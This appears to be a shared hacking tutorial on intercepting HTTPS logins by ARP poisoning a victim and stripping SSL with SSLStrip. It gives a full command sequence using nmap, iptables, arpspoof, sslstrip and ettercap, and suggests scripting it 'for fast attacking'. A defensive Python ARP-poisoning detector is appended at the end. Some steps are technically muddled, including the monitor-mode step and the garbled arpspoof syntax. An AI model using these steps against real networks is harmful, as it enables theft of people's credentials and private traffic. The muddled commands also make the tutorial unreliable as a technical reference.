Advanced MiTM

This document provides instructions for performing a Man-in-the-Middle (MITM) attack using ARP poisoning and SSL stripping to intercept encrypted HTTPS traffic. It explains how SSL encryption can be bypassed by removing the SSL layer using a tool called SSLStrip. The document then provides step-by-step instructions for setting up the attack, including downloading tools, putting the network interface in monitor mode, ARP poisoning the target, stripping the SSL layer, and using Ettercap to capture traffic between the attacker and victim. It warns not to perform this attack illegally and suggests practicing on a home network.

Uploaded by Hamza Qureshi

Advanced MAN-IN-THE-MIDDLE attack tutorial

By S3cur17y Fr43k5.

SSL stands for Secure Sockets Layer. It's an encryption standard used on most sites'
login pages to stop their users' passwords from being packet sniffed in plain text.
This keeps the users safe by having all of that traffic encrypted over an "https"
connection. So, whenever you see "https://" in front of the URL in your browser,
you know you're safe... or are you?

I'm going to show you how to perform a MITM (Man-In-The-Middle) attack on someone
via ARP poisoning. ARP poisoning is a technique used to trick a client into
thinking that your computer is the router, and to forward all their traffic to you.
This allows you to sniff out all the traffic before sending it to the actual
router.

After that, we are going to strip the SSL layer as well, so you can intercept any
login, even logins "protected" by SSL. There is a new tool out called BEAST, which
decrypts SSL/TLS via an encryption flaw. However, we will be using Moxie
Marlinspike's SSL Strip which removes the SSL layer, but makes the connection
appear to be normal.

How SSL Strip Works

An attacker picks a target to attack. Then they spoof themselves to appear as the
wireless access point by making their Media Access Control (MAC) address identical
to the router's. While they appear to be the router, they send packets to the
client/target requesting their packets, thus creating a MITM topology.

The client then forwards requests to the attacker, and the attacker takes the
requests and retrieves them from the server for the client. After they receive it,
the SSL layer gets stripped and the page is sent to the target. The victim then
forwards their packets to the attacker unknowingly, while their private information
is picked out of them. SSL Strip puts the SSL layer back on, fills it out, and sends
it to the server. Everything looks fine to the server and client, except that the
attacker gets the information they desire.

This is going to be done using Linux, because Windows does not have wireless
drivers capable of going into monitor mode. I suggest trying this yourself on a
home network, with two laptops and your friends.

Warnings

Don't perform this on people in public; this is a proof of concept to show you why
SSL is still vulnerable, and how you can protect yourself using a guide I published
previously. Do this on your home network, or you will get caught.

Step 1 Tools Needed for SSL Strip
The following tools can be found in any package repository:
dsniff
sslstrip
iptables
python
python-twisted
ettercap
wireshark
_____________________________________________
In Arch Linux, I run this command in a terminal to download and install them (Ubuntu
users, replace "pacman -S" with "apt-get install"):

sudo pacman -S dsniff iptables python2 python-twisted ettercap wireshark

Now, download SSL Strip from Moxie, while following the install instructions on his
page.

Step 2 Sniffing Traffic (Non-HTTPS)
Get your wireless card into monitor mode, so you're capable of sniffing traffic.

sudo ifconfig wlan0 down && sudo iwconfig wlan0 mode monitor && sudo ifconfig wlan0 up

(Monitor mode is a wireless setting, so it is set with iwconfig; ifconfig only
brings the interface down and back up around the change.)

Now, run wireshark in a terminal to capture airborne packets.

sudo wireshark

Look in the packet information for usernames and passwords in hexadecimal
conversion.

Step 3 Sniffing Traffic (Using HTTPS)

When these commands are entered in the terminal, you need to leave them running, so
open a new tab or terminal for each running command.

First we need to scan the local network for our target IP. This means we are
pinging everyone on the local network and when we get replies, we can see their IP
and pick them as a target.

sudo nmap -sP 192.168.1.0/24

Make sure to paste your test computer's IP somewhere, maybe in a text document so
that you can paste in the commands later.

Next, we need to enable IP forwarding. (This allows you to forward traffic to/from
a client, port and interface that you specify.) Note that a plain "sudo echo 1 >
file" does not work, because the redirect is performed by your own unprivileged
shell, so the write itself has to run as root:

echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

Now we need to set up our interception. This tells your iptables that you want to
pre-route your incoming port 80 traffic (HTTP) to 1024, because this is where you
will be sniffing your traffic from.

sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1024

It's time to ARP poison your second computer to make it send traffic to you.

sudo arpspoof -i [interface] -t [router ip, target ip]

Next we strip the SSL layer off our target, taking the encrypted layer off to be
forwarded to our victim (it even puts the favicon back on so it looks like it's
still HTTPS!). Change directories to wherever you saved SSL Strip before typing
this.

python sslstrip.py -l 1024

Finally, set up ettercap to capture traffic between you and the client.

sudo ettercap -Tq -i [interface]

Now, go log in to an SSL page, or tell your friend to log in to one, and you will
get their traffic. It's simple, and most of this could be tossed into a script for
fast attacking.

How Can I Defend Myself?

Don't use Wi-Fi you don't trust
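On the defensive side, the ARP poisoning step above shows up on the victim's own host as the router's IP suddenly answering from a different MAC, and as one MAC answering for both the router and a client. The following detector is an added example, not part of the original tutorial; it runs that check over constructed ARP records, assumes the gateway is 192.168.1.1 as in the tutorial's subnet, and includes a small parser so real records can be fed from `ip neigh show` on Linux.

```python
"""ARP-poisoning detector (added example, not from the original tutorial).

Flags the gateway IP answering from a new MAC, and one MAC claiming the
gateway plus another host; feed it real records via parse_ip_neigh()."""
from collections import defaultdict

GATEWAY_IP = "192.168.1.1"  # assumed gateway on the tutorial's subnet

# Constructed ARP replies: (seconds, sender IP, sender MAC)
SAMPLE_REPLIES = [
    (0, "192.168.1.1", "aa:aa:aa:aa:aa:01"),   # genuine router reply
    (1, "192.168.1.10", "bb:bb:bb:bb:bb:10"),  # victim laptop
    (5, "192.168.1.1", "cc:cc:cc:cc:cc:20"),   # spoofer claims the gateway IP
    (6, "192.168.1.10", "cc:cc:cc:cc:cc:20"),  # spoofer claims the victim's IP
    (7, "192.168.1.1", "cc:cc:cc:cc:cc:20"),   # repeated claim: no new alert
]


def parse_ip_neigh(text, ts=0):
    """Convert `ip neigh show` output lines into (ts, ip, mac) records."""
    records = []
    for line in text.splitlines():
        fields = line.split()
        if "lladdr" in fields:
            records.append((ts, fields[0], fields[fields.index("lladdr") + 1]))
    return records


def detect_arp_poisoning(replies, gateway_ip=GATEWAY_IP):
    """Return alert strings, in order, for suspicious IP-to-MAC changes."""
    ip_to_mac = {}                 # last MAC seen for each IP
    mac_to_ips = defaultdict(set)  # every IP each MAC has claimed
    flagged = set()                # MACs already reported for the MITM pattern
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        prev = ip_to_mac.get(ip)
        if prev is not None and prev != mac:
            label = "gateway" if ip == gateway_ip else "host"
            alerts.append(f"t={ts}s: {label} {ip} moved from {prev} to {mac}")
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
        claimed = mac_to_ips[mac]
        # One MAC answering for the router and a client is the MITM topology.
        if gateway_ip in claimed and len(claimed) > 1 and mac not in flagged:
            flagged.add(mac)
            others = ", ".join(sorted(claimed - {gateway_ip}))
            alerts.append(f"t={ts}s: {mac} claims gateway {gateway_ip} and {others}")
    return alerts
```

A router that legitimately owns several addresses on the LAN would trip the second rule, so allow-list its MAC before polling `ip neigh show` on a schedule.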
